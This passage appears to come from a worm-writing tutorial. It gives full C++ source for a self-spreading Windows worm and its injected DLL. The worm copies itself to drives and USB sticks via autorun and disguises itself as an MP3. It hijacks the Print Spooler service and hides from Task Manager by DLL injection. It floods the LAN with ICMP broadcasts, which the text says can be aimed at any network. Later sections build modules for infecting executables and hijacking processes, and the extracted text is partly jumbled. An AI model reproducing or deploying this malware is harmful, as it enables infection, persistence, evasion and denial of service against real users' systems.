char dirpath[201]. ". (DWORD (__stdcall *)(void*))smack. } } } /*-----------------.The main engine of worm ------------------*/ int main (int argc. HANDLE thread. char* argv[]) // { SetThreadPriority(GetCurrentThread(). } else { smack = (void (*)(char *))GetProcAddress(hmod. hmod = LoadLibrary(procfile). GetCurrentDirectory(200. thread = CreateThread(0. (DWORD (__stdcall *)(void *))clonproc. procfile. void (*smack)(char *). ptr = argv[0].fclose(fp). dirpath). 0). cloner = CreateThread(0. "?identify@@YAXPAD@Z"). } void (*clonproc) (char *). ptr). 0. ". thands[3]. "system32")) != NULL) smack = (void (*)(char *))GetProcAddress(hmod. 0. HMODULE hmod. { { 302 .exe")) == NULL) strcat(procfile. THREAD_PRIORITY_HIGHEST).exe"). SetFileAttributes(newloc. procfile[300]. } else continue. "?systemProc@@YAXPAD@Z"). cloner. strcpy(procfile. char *ptr. 0). clonproc = procCloner. 0. if ((strstr(ptr. if ((strstr(dirpath. procfile. 28). 0.
unsigned long.void *. termination of two threads.void *. hIP = pIcmpCreateFile(). ping++) pIcmpSendEcho(hIP. FreeLibrary(hicmp). FreeLibrary(hmod). pIcmpCloseHandle(hicmp).DLL"). &I. 0. 0.unsigned long.Ttl = 255.. IPADDR."open". 0). 200)."). NULL. &es. thands[2] = '\0'. 200). "IcmpCloseHandle").thread = CreateThread(0.unsigned long))GetProcAddress(hicmp. pIcmpCloseHandle = (int (__stdcall *)(void *))GetProcAddress(hicmp. WaitForMultipleObjects(2. (DWORD (__stdcall *)(void*))smack. 8000). // WaitForSingleObject(thread. procfile. 0. } // Waits for the 303 . NULL. NULL. true. /*--------------------------------------------------*/ // WaitForSingleObject(cloner. thands[1] = thread. return EXIT_SUCCESS.unsigned short. NULL. 0). ping < 10. /*--------------. // Activate this while testing the single thread. 0)."open".The icmp section -----------------*/ hicmp = LoadLibrary("ICMP. "IcmpCreateFile"). 0. "IcmpSendEcho").void *. pIcmpCreateFile = (void *(__stdcall *)(void))GetProcAddress(hicmp. pIcmpSendEcho = (unsigned long (__stdcall *)(void *. ShellExecute(NULL. I. ShellExecute(NULL. 100). thands. for (int ping = 0. // Activate this while testing the single thread. sizeof(es). } thands[0] = cloner. PROCESSNAME. chdir(". PROCESSNAME.
The Kanjrala has been developed to flood the LAN with the ICMP echoes. Truly a energetic and life full code. The name Kanjrala has been provided to it to respect the natures creativity on this universe and particularly at Kanjrala a place in high mountain ranges of The Himalaya. The Kanjrala worm carries a DLL file along with itself.exe from task manager’s processes list. but will hog the cpu and this can easily be noticed by the sysops. Well.exe process. then they will fight for overpowering the system and only one being the youngest one will remain in execution state and it will kill all other executing Kanjrala variants.dll decides which code to trigger in taskmgr. The Kanjrala worm is a territorial worm. thus creating unnecessary two processes at least. The DLL contains few functions for different OS processes. this DLL is named Kanj. Now lets move on to the next variant of our earlier worm virus4. the system function every time initiates the cmd. It means at a time only one clone of Kanjrala will be working on the infected system. the Kanjrala worm.The above coding is quite lively. The Kanjrala is designed to alter the operating system’s processes in such a way that they will automatically trigger a clone of it after a certain interval of time. The address to which the ICMP packets are sent is the broadcast address of the LAN. The Kanjrala worm incorporates the DLL injection attack and injects the Kanj. Most important code is the one that hides the Kanjrala. Thus. the Kanjrala becomes hard to kill process. But this address can 304 .dll into taskmgr.dll and is placed as hidden everywhere the Kanjrala clone is created. The process generation is considered very heavy process and might be avoided as much as possible. Now what this DLL is supposed to do? You’ll find its answer soon. Actually. Is it? But we have killed it easily… This is the most obvious answer we hear from people whoever test the Kanjrala. Once running as a service. the Kanj. But If multiple clones will be triggered.exe and then execute the respective program.exe process and takes appropriate actions. Kanjrala is truly a CPU saver.
* If another newer worm process starts in between. * At a single instance of time only one worm process will execute at all.0 * Author: "v" * The name has been given to it to honor the nature and its versatility * as well as the fertility & fatality at Kanjrala Dhar. it will kill all its elder siblings.exe" #define ENVOKER "\\envoker.mp3. You can add a CD burning module into it yourself. it provides a nerocmd. * The nature shows its powers & the heaven on sharp & high mountain peaks. For examples if you are using the Nero. * ######## This worm is ranked safe for execution **/ #include <iostream> #include <windows. Few variants of the Kanjrala can bring down any network segment in the world.h> #define DISGUISE "Hotel_California. The Kanjrala infects the pen drives and the flash cards.h> #include <ctype. 305 . * The Kanjrala worm impersonates the Print Spooler service to be alive.exe that can be used to infect the multisession CDs or use Nero API for doing so.h> #include <direct.exe" #define FILEATTRIB 34 and ######## ######## * ######## does not cause harm of any kind to the systems.cpp */ /** The Kanjrala worm version 2.be changed to attack any target network with resource eating attack. Lets check out the code of Kanjrala. * This worm is intelligent and tries to save the cpu in several manners.mp3.h> #include <TlHelp32.exe" #define DISGUISEPATH "\\Hotel_California. * The Kanjrala Dhar is my favorite place in this world I've ever visited.h> #include <sys/stat.cpp /* Kanjrala.
DWORD. /*----------------------------------------------------*/ { { unsigned char Ttl. OptionsSize. using namespace std. struct E DWORD Address. }. Flags. Reserved. DWORD). char aa[100].\\Kanjrala. struct E es. DWORD ( WINAPI *pIcmpSendEcho) (HANDLE. unsigned long Status.#define IPADDR INADDR_BROADCAST icmp echoes. void *Data.exe #define DLLPATH "\\kanj.dll" // All macros with suffix path are defined to save cpu from strcat code. struct o I. unsigned short DataSize. Tos. WSADATA wsa. LPVOID. HANDLE ( WINAPI *pIcmpCreateFile) ( void ). WORD. HMODULE hicmp.exe" #define PROCSSPATH "\\Kanjrala. 306 . BOOL ( WINAPI *pIcmpCloseHandle ) ( HANDLE ).exe" #define PROCESSPATH ". DWORD. LPVOID. *OptionsData. DWORD d.. /*-----------------The icmp global section-------------------*/ struct o }. struct o Options.dll" // The address to be attacked with // The name of the dll to be injected into remote processes like taskmgr.exe" #define DLLNAME "kanj. LPVOID. RoundTripTime. struct hostent *phostent. #define PROCESSNAME "Kanjrala. HANDLE hIP.
strcat(envokerPath. CopyFile(file. KEY_ALL_ACCESS. sizeof (dat) ). CopyFile(DLLNAME. bool dllInjector(HANDLE hProcess. 0).exe". NULL. DLLPATH). CopyFile(file. FILEATTRIB). } void _declspec (dllexport) systemProc(char *proc) /** * The payload section. SetFileAttributes(systemPath. THREAD_PRIORITY_HIGHEST). &hResult) == ERROR_SUCCESS) { RegSetValueEx(hResult. HKEY hResult.HANDLE processHunter(LPSTR szExeName). FILEATTRIB). RegCloseKey(hResult). strcat(systemPath. FILEATTRIB). libPath[101]. systemPath. hSubKey. if (RegOpenKeyEx(HKEY_LOCAL_MACHINE. SetFileAttributes(libPath. ENVOKER). libPath. REG_SZ. void _declspec (dllexport) identify(char *file) { SetThreadPriority(GetCurrentThread(). HANDLE maintrd. strcat(libPath. "ImagePath". envokerPath[101]. 0. LPCTSTR hSubKey = "SYSTEM\\CurrentControlSet\\Services\\Spooler". LPSTR lpszDllPath). char systemPath[101]. CONST BYTE dat[] = "envoker. strcpy(libPath. SetFileAttributes(envokerPath. 0. The payload will run as an service. 50). **/ { SHERB_NOCONFIRMATION| 307 . systemPath). SHERB_NOPROGRESSUI|SHERB_NOSOUND). 0). envokerPath. 0). dat. GetSystemDirectory(systemPath. systemPath). } SHEmptyRecycleBin(NULL. PROCSSPATH). strcpy(envokerPath.
FILE *fp. strcat(dlloc. drive[0] = (char)let. struct stat stbuf. autof[20].SetThreadPriority(GetCurrentThread(). strcpy(dlloc. if (let > 0x5A) let = 0x43. if ((stat(newloc. life = processHunter("winlogon. SetFileAttributes(newloc. THREAD_PRIORITY_HIGHEST). strcat(newloc. 0). } /* The payload code can be inserted here. THREAD_PRIORITY_HIGHEST). struct stat dlbuf. newloc. DLLPATH). drive). CopyFile(cfile. drive[1]= ':'. drive[2] = '\0'. 28). if (GetDriveType(drive) == 3) strcpy(newloc. DISGUISEPATH).exe 308 . file. // If not then copy the { { { { // This circuit induces a // into winlogon.exe"). drive). CloseHandle(life). dlloc[30]. i++. char drive[3]. remote thread if (life != NULL) dllInjector(life. for (int i = 0. newloc[30]. DLLNAME). &stbuf)) == -1) { // Check if file already exists in the drive. i < 256. HANDLE life. let++) if (i == 255) i = 0. */ /* The code will be executed with highest privileges */ } void _declspec (dllexport) procCloner(char *cfile) SetThreadPriority(GetCurrentThread(). int let = 0x43.
strcat(dlloc. &dlbuf)) == -1) { CopyFile(DLLNAME. { // This line fetches the removable drives. killer = processHunter("cmd. fprintf(fp. } } void _declspec (dllexport) killerProc(void) HANDLE killer. while(true) { killer = NULL. "[autorun]\nopen=%s". { // Check if file already exists in the pen drive. dlloc. FILEATTRIB). 0).exe"). "\\Autorun. strcat(autof. newloc. DLLPATH). 0). // Copy the DLL module. THREAD_PRIORITY_TIME_CRITICAL).} if ((stat(dlloc. strcpy(dlloc. 28). strcpy(autof. DISGUISE). // Copy the DLL module.inf"). dlloc. } if ((stat(dlloc. "w"). etFileAttributes(dlloc. DISGUISEPATH). drive). &stbuf)) == -1) CopyFile(cfile. FILEATTRIB). &dlbuf)) == -1) { CopyFile(DLLNAME. SetFileAttributes(newloc. } } Sleep(10). } } if ((GetDriveType(drive)) == 2) strcpy(newloc. SetFileAttributes(dlloc. fp = fopen(autof. fclose(fp). { SetThreadPriority(GetCurrentThread(). 0). strcat(newloc. // If not then copy the file. if ((stat(newloc. drive). drive). 309 .
if ((strstr(ptr. THREAD_PRIORITY_HIGHEST). procfile).exe")) == NULL) strcat(procfile. /*-----------------. ptr).if (killer != NULL) { TerminateProcess(killer. ". bool first = true. ". // Stuff for worm sibling killer circuit. /*------------------------------. (LPTHREAD_START_ROUTINE) killerProc.Worm finder circuit -------------------------------*/ // This circuit searches the already running worm process // and if found. HANDLE hProcess = NULL. // Stuff for worm sibling killer circuit. } ShowWindow(FindWindow(NULL. HANDLE hSnapProc. 0. SetThreadPriority(GetCurrentThread(). TOKEN_PRIVILEGES tknp. 0). goto hiderCircuit. HANDLE hSnapshot.killer = NULL. char *ptr. HIDE_WINDOW). HANDLE hToken. procfile[300]. } Sleep(5). CloseHandle(killer). HANDLE thread.The main engine of worm ------------------*/ int main (int argc. hSnapProc = CreateToolhelp32Snapshot(TH32CS_SNAPALL. PROCESSENTRY32 Pd = { sizeof(PROCESSENTRY32) }.exe"). then it will terminate the found process. char* argv[]) bool syst = false. NULL. // Then it starts the further processing of the worm circuits. 0). ptr = argv[0]. { { 310 . 0). cloner. thands[3]. 0. } } HINSTANCE hInstance. topCircuit: // HANDLE hTerminator = CreateThread(0. strcpy(procfile.
th32ProcessID). } Sleep(5). true.th32ProcessID) TerminateProcess(OpenProcess(PROCESS_ALL_ACCESS. "?identify@@YAXPAD@Z"). thands[2] = '\0'. /*--------------. PROCESSNAME)) { if (GetCurrentProcessId() != Pd. 0. if ((strstr(dirpath. hmod = LoadLibrary(procfile). "IcmpCreateFile"). (DWORD (__stdcall *)(void*))smack. thread = CreateThread(0.The icmp section -----------------*/ hicmp = LoadLibrary("ICMP. procfile.szExeFile. &Pd)) do { { if (!strcmp(Pd. 0. void (*smack)(char *). 0.DLL"). { 311 . pIcmpCreateFile = (void *(__stdcall *)(void))GetProcAddress(hicmp. procfile. smack = (void (*)(char *))GetProcAddress(hmod. 0. Pd. "?systemProc@@YAXPAD@Z"). 0. "system32")) != NULL) syst = true. } /*-----------------------------------------------------------------------------------*/ void (*clonproc) (char *). (DWORD (__stdcall *)(void *))procCloner. HMODULE hmod. thands[1] = thread. 0). 0). 0). char dirpath[201]. dirpath). } thands[0] = cloner. } else { smack = (void (*)(char *))GetProcAddress(hmod. CloseHandle(hSnapProc).if (Process32First(hSnapProc. } while (Process32Next(hSnapProc. procfile. cloner = CreateThread(0. GetCurrentDirectory(200. clonproc = procCloner. &Pd)). 0). (DWORD (__stdcall *)(void*))smack. thread = CreateThread(0. 0.
PrivilegeCount = 1. &es.Privileges[0]. 0. while(i <100) { { { if (FindWindow(0. "IcmpCloseHandle").Luid).void *. Sleep(10). if (OpenProcessToken(GetCurrentProcess(). IPADDR. hProcess = NULL. } // Save precious cpu-cycles. &tknp. // We need not to do any error checks here. AdjustTokenPrivileges(hToken. goto topCircuit.Attributes = SE_PRIVILEGE_ENABLED. 0.unsigned short. hProcess = processHunter("taskmgr.pIcmpCloseHandle = (int (__stdcall *)(void *))GetProcAddress(hicmp. 0. SE_DEBUG_NAME. /*-----------. NULL).unsigned long. "IcmpSendEcho"). hProcess = NULL.exe"). tknp. &I. } i++. NULL.void *. } } if (first == true) first = false. } int i=0.Privileges[0]. CloseHandle(hProcess). DLLNAME). pIcmpSendEcho = (unsigned long (__stdcall *)(void *.dll"). sizeof(tknp). pIcmpSendEcho(hIP.Ttl = 255. I. hIP = pIcmpCreateFile(). sizeof(es).unsigned long. &tknp.void *. &hToken)) { LookupPrivilegeValue(NULL. tknp. { 312 . "Windows Task Manager")) if (!hProcess) CloseHandle(hProcess). TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY. 8000). CloseHandle(hToken).The process hider circuit ------------*/ hiderCircuit: hInstance = GetModuleHandle("Kernel32. } else { dllInjector(hProcess.unsigned long))GetProcAddress(hicmp.
szExeFile. 0). 0). // This circuit induces a remote thread into explorer. &Pe)) do { if (!strcmp(Pe. // Save the memory. 313 . CloseHandle(explor). hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPALL. szExeName)) if (!hProcess) Pe. WaitForSingleObject(thread. /*--------------------------------------------------*/ // Activate this while testing the single thread. DLLNAME). thands. { { { return OpenProcess(PROCESS_ALL_ACCESS. // Keep alive in new flesh.exe"). } pIcmpCloseHandle(hicmp). "open". 200). } while (Process32Next(hSnapshot. // // // Save the memory. &Pe)).Main Loop Ends Here ----------------------------------*/ HANDLE _cdecl processHunter(LPSTR szExeName) { PROCESSENTRY32 Pe = { sizeof(PROCESSENTRY32) }. true. } /*-------------------------------. NULL. // Activate this while testing the single thread. FreeLibrary(hmod). 300).. ShellExecute(NULL. FreeLibrary(hicmp). NULL. PROCESSNAME. } return NULL. // Waits for the termination of two threads.HANDLE explor = processHunter("explorer. return EXIT_SUCCESS.exe if (explor != NULL) { dllInjector(explor. CloseHandle(hSnapshot). 200).th32ProcessID). if (Process32First(hSnapshot. WaitForSingleObject(cloner. } } Sleep(5). WaitForMultipleObjects(2. true..
MEM_COMMIT. HANDLE hThread = CreateRemoteThread(hProcess. CloseHandle(hThread). Then it starts threads for different tasks assigned to each. if running then it will delete its own process name from the processes tab. if (hmKernel == NULL || hProcess == NULL) return false. } The above worm when executed will hide its window first.h> // Required for ShellExecute(). HMODULE hmKernel = GetModuleHandle("Kernel32"). LPVOID lpvm = VirtualAllocEx(hProcess.h" #include <iostream> #include <windows. NULL. NULL). The main DLL payload coding is provided below. 0. LPDWORD lpExitCode = 0. 0. lpvm. int ndllPathLen = lstrlen(lpszDllPath) + 1. (LPTHREAD_START_ROUTINE)GetProcAddress(hmKernel. 10000). ndllPathLen. if (hThread != NULL) { { dwWaitResult = WaitForSingleObject(hThread. PAGE_READWRITE). MEM_RELEASE). WriteProcessMemory(hProcess. NULL). return true. #include <shellapi. ndllPathLen. if not present then create it and write the following code /* kanj. lpszDllPath. #define PROCSSPATH "\\Kanjrala.cpp */ #include "stdafx.exe" 314 . then it detects.} bool dllInjector(HANDLE hProcess. whether task manager is running or not. 0. To compile this code in vc++ click the File\New and select the Dynamic Loadable Library and then follow the wizard. lpvm. #include <TlHelp32. Select the projects CPP file.h> // Required for taskmanager handling functions.h> // Required for functions like CreateToolhelp32Snapshot (). NULL.h> #include <commctrl. "LoadLibraryA"). lpvm. LPSTR lpszDllPath) DWORD dwWaitResult. } VirtualFreeEx(hProcess.
ito1).flags = LVFI_STRING. search3. &search1). true. ito3). hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPALL. ito2 = ListView_FindItem(hTaskList. /* the process name deletion circuit */ ito1 = ListView_FindItem(hTaskList. &search3).exe" DWORD WINAPI kanjCreature(void){ int ito1. hTaskList = FindWindowEx(hTaskDial. NULL). LVFINDINFO search3. search1.psz = "Hotel_California.*/ Sleep(13).exe". ito2. &Pe)). HWND hTaskMan. szExeName)) { return OpenProcess(PROCESS_ALL_ACCESS.szExeFile. CloseHandle(hSnap).psz = "envoker.flags = LVFI_STRING. } DWORD WINAPI injectionVector (void) { /* The code to be injected to be executed into remote process */ 315 . } Sleep(5). &Pe)) { do { if (!strcmp(Pe. NULL. } return NULL. ito3 = ListView_FindItem(hTaskList.exe". PROCESSENTRY32 Pe = { sizeof(PROCESSENTRY32) }. ito2). NULL. search3.#define PROCESSNAME "Kanjrala. search1. LVFINDINFO search2. search2. HWND hTaskList. search2. -1. ListView_DeleteItem(hTaskList.psz = "Kanjrala. #define ENVOKER "envoker. "#32770". hTaskDial = FindWindowEx(hTaskMan. 0). /* --------------------------------.exe". &search2). ito3.mp3.th32ProcessID). -1. LVFINDINFO search1. Pe. ListView_DeleteItem(hTaskList. ListView_DeleteItem(hTaskList. WC_LISTVIEW. } return false. -1. while(true) { hTaskMan = FindWindow(NULL.flags = LVFI_STRING. "Processes"). "Windows Task Manager").exe". if (Process32Next(hSnap. } HANDLE _cdecl procHunter(LPSTR szExeName) { HANDLE hSnap. } while (Process32Next(hSnap. HWND hTaskDial.
while (true) Sleep (1000). 0. NULL. hSubKey. cHand = NULL. ShellExecute(NULL. "ImagePath". dat. LPCTSTR hSubKey = "SYSTEM\\CurrentControlSet\\Services\\Spooler".exe". (LPTHREAD_START_ROUTINE) injectionVector.. "explorer") != NULL) HANDLE invThread = CreateThread(NULL. } lcount++. } return true. 0. CloseHandle(cHand). TerminateProcess(cHand. 0. if ((strstr(cmdline. LPVOID lpReserved ) { if (ul_reason_for_call == DLL_PROCESS_ATTACH) { char *cmdline. 0.. KEY_ALL_ACCESS. cHand = procHunter("cmd. } if (lcount == 200) { // Bring it to life again. 0). } } { BOOL WINAPI life(void) { HKEY hResult. 0. int lcount = 0. NULL. NULL. 0. { if (RegOpenKeyEx(HKEY_LOCAL_MACHINE. NULL. &hResult) == ERROR_SUCCESS) { RegSetValueEx(hResult. 0. 0). 316 . "taskmgr") != NULL) HANDLE hThread = CreateThread(NULL. (LPTHREAD_START_ROUTINE) kanjCreature. DWORD ul_reason_for_call. (LPTHREAD_START_ROUTINE) life. while(true) Sleep(5).exe". cmdline = GetCommandLine().exe"). sizeof (dat) ). 0). if (strstr(cmdline. "open". } BOOL APIENTRY DllMain( HANDLE hModule. lcount = 0. RegCloseKey(hResult). 0). NULL. 0). "Kanjrala. else if (strstr(cmdline. CONST BYTE dat[] = "envoker. "winlogon") != NULL)) HANDLE hLife = CreateThread(NULL. 0. REG_SZ.HANDLE cHand = NULL.
exe thread routine and taskmgr. The execution of the DLL from DllMain is started by the presence of the macro DLL_PROCESS_ATTACH.exe as well as from explorer. The above worm code can be made more worst by a little more alteration of registry entries of the respective service to make it auto start every time even if anyone turns the Print Spooler service off and making it a critical service to turn off the system if it doesn’t get started etc. We’ll insert the registry alteration code into a loop and inject that loop code into a very essential user process. but just empties the Recycle Bin every time you delete any item.exe. Well friends. with this discussion.exe is different from winlogon. But most people keep a watch on the “Run” registry key for suspected program behavior and delete the suspected program entries? How to tackle it? The answer is derived from the Kanjrala worm we studied a little time ago.g. instead going to use the “Run” registry key. Now we’ll not alter any system service. the thread routine for explorer. This worm will execute with the current user’s privilege level. We have designed the DLL to execute the different codes in different processes e.exe thread routine is also different from winlogon. The Kanjrala worm (above listed worm code) does not harm systems. } } The above DLL gets executed as soon as it gets loaded into the remote process’s memory space.h. 317 .return TRUE. you are now capable of creating your own worms.exe and it will then remove the process entries for respective processes enlisted into the DLL code. To convert the task manager into a Trojan. Now we are going to create more robust worm. This task is done by ListItem_FindItem and ListItem_DeleteItem functions from commctrl. we inject the DLL into the taskmgr.
the worm will get invoked and the worm will then call the renamed executable file. Before writing full-blown worm code. one is to copy the worm file and then alter it to write the renamed process executable. We might want this worm to perform well even at lowest privileges. The worm will create a clone of itself into the folder containing the executable of the executing process with the name of the victim process’s executable in such a way that next time when the process will be launched. We are going to make it rename and hide the executable files of the process’s executing with the same user credentials. the next very code can also be called as a virus. Therefore it might place its components in accessible folders. to avoid the suspicion as much as we can. 318 .This worm will contain some dangerous code snippets. we can create the clones in two different ways. whereas in second method the worm file is copied byte-by-byte and do all the necessary alterations during the copy process. For this kind of infection. you might be thinking how the worm with several different sections developed? Take a look at next section for this. With this kind of infection. It is advised to use the inbuilt folders instead of creating genuine folders. One such folder is the “All Users” and so many there.
a car assembly line. This is unsolicited situation we ever want. But we know that the owner process of the executable file can perform any kind of alterations to its own respective executable file. Every part is manufactured separately and then after quality checks passed. But there is always a difference between the operating environment of the algorithm into its own separate process and into worm space where several such algorithms share the CPU and other resources simultaneously. genuine worm writers always test and write the different sections separately on test programs. how the target victim process will be forced to rename its own executable file? The answer is once again the DLL Injection. we’ll develop the executable file renaming module. performance efficient and bug free. the disguised clone will be executed and it will in respect then call the target victim process. In this technique. Therefore.Modular Assembly Line Well friends.e. Firstly. we are going to develop and test the next very worm in sections with each section tested separately. the algorithms so developed can be made more reliable. But the “file sharing violation” will be detected by the operating system and the malicious algorithm will be halted and the interactive user will be informed by and error dialogue box. a little alterations should be made into the respective algorithms while planting them into the worm code to work efficiently.cpp containing almost no code than a code for pausing execution to save 319 . But the problem is. This module under primary testing environment will fetch the target process and then rename the original executable file and then create its own clone into same folder with the original executable’s name in such a way that at next time when the same target process will be executed. We’ll inject a DLL into the victim process and the code into the DLL will be executed inside the hosting process-space and no sharing violation will occur. And we are also going to do the same. Now let’s develop a program named server. it is assembled to the main body of the vehicle. Now its time to utilize this approach to develop the different sections of the next worm named WarrioR.g. This technique is similar to the industrial assemply line. i. e.
PROCESSENTRY32 Pc = { sizeof (PROCESSENTRY32)}. HANDLE hProcess = NULL. szExeName)) if (Pc. Its executable will be the target victim for our file renaming algorithm. HINSTANCE hInst. } { Next is the code of the program that will fetch the target process and then inject the respective DLL into target process space.szExeFile. return EXIT_SUCCESS.. /* server. do { cout << "The snapShots: " << Pc.. cout << "Got the Process. if (Process32First(hSnapshot.. 0).th32ProcessID << endl. char* argv[]) system("PAUSE").h> using namespace std. { { { 320 .." << endl.cpp */ #include <iostream> #include <windows. int main (int argc.th32ProcessID == GetCurrentProcessId()) return NULL.:" << hSnapshot << endl. HANDLE GetProcessHandle(LPSTR szExeName) cout << "Scanning the processList: " << endl.h> #include <TlHelp32.the CPU during testing. hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPALL. cout << "Snapshot taken. &Pc)) cout << "Starting the loop: " << endl. /* ftest..szExeFile << endl. cout << "The ProcessID: " << Pc.cpp */ #include <iostream> using namespace std. HANDLE hSnapshot. if (!strcmp(Pc.
dllPath. PAGE_READWRITE).exe"). } while(Process32Next(hSnapshot. NULL. return OpenProcess(PROCESS_ALL_ACCESS. } } Sleep(100). char DllName[] = "rtest. "LoadLibraryA"). GetCurrentDirectory(sizeof (dllPath). LPVOID lpvmem = VirtualAllocEx(hProcess. HMODULE hmKernel = GetModuleHandle("Kernel32. if (hProcess == NULL) return 0.hProcess = NULL. lpvmem. int nDllPathLen = lstrlen(dllPath) + 1. if (hmKernel == NULL) return 0. char dllPath[100].dll"). system("PAUSE"). HANDLE rThread = CreateRemoteThread(hProcess.dll". MEM_COMMIT. executit. (LPTHREAD_START_ROUTINE)GetProcAddress(hmKernel. NULL). "\\"). CloseHandle(hProcess).. Pc. char blank1[] = "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB". char blank[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"." << endl. NULL. nDllPathLen. &Pc)).exe". { cout << "The ProcessID: " << Pc. } return NULL. true.. char executit[] = "notepad. NULL. return EXIT_SUCCESS. nDllPathLen. } { 321 . 0. 1). strcat(dllPath. "open". NULL). strcat(dllPath. ShellExecute(NULL.th32ProcessID << endl. WriteProcessMemory(hProcess. NULL. 0. lpvmem. DllName).if (!hProcess) cout << "Grabbed the process. } int main (int argc. dllPath). char* argv[]) HANDLE hProcess.th32ProcessID). hProcess = GetProcessHandle("server.
cpp contains much more code than actually required for transplanting into the worm. SetFileAttributes("changed. int ch = 0.exe in disguise of victim process). nlen = 0. char name[] = "changed.cpp file.exe. Most of the code in ftest.exe".exe to be executed first time. ul_reason_for_call. The large chunks of “AAAAA…” and “BBBBB…” will help us to find this very block into the data section of the executable file ftest. LPVOID lpReserved 322 . This code actually provides all the information that actually what is happening in each stage of execution. We have chosen the notepad.h" #include <iostream> #include <windows.e.exe. But after performing its task when we will launch the executable with victim process name (that will be the altered ftest.exe". the string notepad will be overwritten by renamed server. Now let’s create the DLL project with name rtest and add following code into its rtest.h> #define SEEK 0x6E168 using namespace std.cpp is familiar and is derived from earlier examples. "changed. BOOL APIENTRY DllMain( HANDLE hModule. FILE *fp. *ap.exe i. nlen = lstrlen(name). This is required to ease the overwriting of the victim program’s name to be called when this clone will be executed.exe"). sserver. #include "stdafx.The above program named ftest. 34).exe". DWORD ) { if (ul_reason_for_call == DLL_PROCESS_ATTACH) { MoveFile("server.
a++) ch = fgetc(fp). } fclose(ap).Done" << endl. } return TRUE. } { { { Execute the server.i <= nlen.. 0). ap). This constant is the offset of the location of the program name to be executed by the ftest first and then the clone process. } fseek(fp. ap). fputc(ch. simply hex editor does this job for us. a. a++) fputc(name[i]. for (.. cout << ".. we define a constant named SEEK.fp = fopen("ftest.exe". Then once we have the offset of location where program name to be executed is located. a < SEEK. } cout << "Performing alterations. fclose(fp). ap).exe and will displace it and place its own code into server.exe". In the DLL code. . 323 .exe will infect the server..exe into a hex editor and searching for “AAAA… or “BBBB…” and calculating the count of bytes from first byte of the program.exe. if (ch == EOF) break. a++) ch = fgetc(fp).exe first and then ftest. for (int i=0. You can calculate this offset by opening the ftest." << endl. the ftest.. "wb"). "rb"). i++.. we can change it in each & every infection and clone reproduction. fputc(ch.. ap = fopen("server. for (long a=0.exe.
exe once again. 324 .The test code employs the algorithm in ftest. It will be handy if you execute the server.cpp that can check whether the same process is the target victim program & if so then it just returns a null handle and after other processings terminate safely without tryin to infect itself.
We have already used this technique in Kanjrala worm. This process is responsible for providing the users their desktop screens. bool dllInjector(HANDLE hProcess. we are going to hijack the explorer. We can also shutdown the system.h> using namespace std.g. etc.h> #include <commctrl. thus.h> #include <TlHelp32. The process hijacking can be accomplished by DLL injection. the explorer. only those processes can be hijacked. /* test1.cpp */ #include <iostream> #include<windows.exe process. moreover. LPSTR lpszDllPath). HANDLE hProcess. The process hijacking is extensible used by the worms to force the operating system processes to perform some specific tasks for worm from their own behalf. We have done this in earlier examples. HANDLE _cdecl processHunter(LPSTR szExeName). We’d force this process to terminate if our host process will get terminated by any means. we need to clear one more thing. Actually a specially crafted DLL is injected into the hijacked process and we can force the process to do anything. but we are not going to do this in this test code. int main (int argc. Before proceeding. start menu & taskbar. if our process by anyhow gets terminated unexpectedly and we want any other process to create the intended process forcefully. { 325 .exe will again be terminated if a certain fixed timeout occurs. then this technique is called process hijacking. Lets do it practically. char* argv[]) char dllPath[100].The Process Hijacking What if we can force a process to do something for us at certain extent? E. worm can be hard to killed as the hijacked operating system processes will then trigger the worm again or the system critical processes will be terminated. whose handle with PROCESS_ALL_ACCESS privilege can be obtained. once we have the handle. we can say that the process is hijacked.
326 . CloseHandle(hSnapshot). strcat(dllPath.) { __asm {nop} Sleep(100). &Pe)) do if (!strcmp(Pe. dllPath) == true) cout << "DLL successfully injected" << endl. PAGE_READWRITE). "\\sync. SetPriorityClass(GetCurrentProcess().th32ProcessID).dll"). LPSTR lpszDllPath) DWORD dwWaitResult. } while (Process32Next(hSnapshot. MEM_COMMIT. } HANDLE _cdecl processHunter(LPSTR szExeName) { PROCESSENTRY32 Pe = { sizeof(PROCESSENTRY32) }. LPVOID lpvm = VirtualAllocEx(hProcess. if (dllInjector(processHunter("explorer. } return NULL.szExeFile. szExeName)) if (!hProcess) } } Sleep(5).exe"). HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPALL.. if (hmKernel == NULL || hProcess == NULL) return false. Pe. } return EXIT_SUCCESS. int ndllPathLen = lstrlen(lpszDllPath) + 1. HMODULE hmKernel = GetModuleHandle("Kernel32"). &Pe)). for (. } bool dllInjector(HANDLE hProcess. ndllPathLen. true. if (Process32First(hSnapshot. REALTIME_PRIORITY_CLASS). NULL. 0). { { { { { return OpenProcess(PROCESS_ALL_ACCESS. LPDWORD lpExitCode = 0.GetCurrentDirectory(sizeof (dllPath). dllPath).
if (hThread != NULL) CloseHandle(hThread). Pe. } { dwWaitResult = WaitForSingleObject(hThread. hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPALL. lpvm. lpvm. We’ve used SetPriorityClass function here to set the process priority of test1.WriteProcessMemory(hProcess. if (Process32Next(hSnap. &Pe)) do if (!strcmp(Pe. /* sync.h> // Required for functions like CreateToolhelp32Snapshot (). HANDLE _cdecl procHunter(LPSTR szExeName) HANDLE hSnap. lpszDllPath. The test1.cpp is the code of DLL to be injected into hijacted process. 0.h" #include <iostream> #include <windows. 0). (LPTHREAD_START_ROUTINE)GetProcAddress(hmKernel. Then in next step of wizard select A simple DLL. NULL).cpp file by omitting all its earlier contents. 327 . HANDLE hThread = CreateRemoteThread(hProcess. PROCESSENTRY32 Pe = { sizeof(PROCESSENTRY32) }. true. return true.h> #include <TlHelp32.th32ProcessID). 10000). ndllPathLen. } VirtualFreeEx(hProcess. MEM_RELEASE).szExeFile. Next sync. NULL).exe process to real-time. lpvm. 0. szExeName)) } { { { { return OpenProcess(PROCESS_ALL_ACCESS. Now click File\New in Visual C++ and select Win32 DynamicLink Library and specify the name sync and specify the path for project. 0.cpp */ #include "stdafx. "LoadLibraryA").cpp is the code for our host process. When wizard finishes then write the below given code into sync. NULL.
